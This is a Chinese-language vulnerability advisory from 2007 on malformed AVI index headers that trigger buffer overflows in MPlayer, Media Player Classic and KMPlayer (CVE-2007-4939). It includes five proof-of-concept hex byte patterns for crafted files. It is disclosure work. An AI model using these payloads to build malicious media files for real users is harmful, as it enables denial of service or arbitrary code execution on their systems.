安全研究
安全漏洞
多个媒体播放器AVI文件头解析缓冲区溢出及拒绝服务漏洞
发布日期:2007-09-11
更新日期:2007-09-13
受影响系统:
MPlayer MPlayer 1.0 rc1描述:
guliverkli Media Player Classic 6.4.9.0
KMPlayer KMPlayer 2.9.3.1210
BUGTRAQ ID: 25648,25650,25651
CVE(CAN) ID: CVE-2007-4939
MPlayer、media player classic和KMPlayer都是非常流行的媒体播放器。
上述媒体播放器在处理畸形格式的AVI文件时存在漏洞,远程攻击者可能利用此漏洞通过诱使用户处理恶意文件控制用户系统。
如果AVI媒体文件的头设置有畸形的indx truck size、wLongsPerEntry或nEntriesInuse值的话,则用户使用上述媒体播放器打开了该文件的话就可能触发多个缓冲区溢出或空指针引用,导致拒绝服务或执行任意指令。
<*来源:Code Audit Labs (http://www.vulnhunt.com)
链接:http://marc.info/?l=bugtraq&m=118962107016247&w=2
http://secunia.com/advisories/26808/
http://secunia.com/advisories/26807/
http://secunia.com/advisories/26806/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
测试2 (new_avihead_poc2.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
测试3 (new_avihead_poc3.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
测试4 (new_avihead_poc4.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10
indx truck size 0x0000ff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
测试5 (new_avihead_poc5.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40
indx truck size 0x0000ff00
wLongsPerEntry 0x0004
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x40000010
建议:
厂商补丁:
MPlayer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mplayerhq.hu/homepage/design6/news.html
guliverkli
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://guliverkli.sourceforge.net/
KMPlayer
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://kmplayer.kde.org/
浏览次数:2688
严重程度:0(网友投票)
绿盟科技给您安全的保障
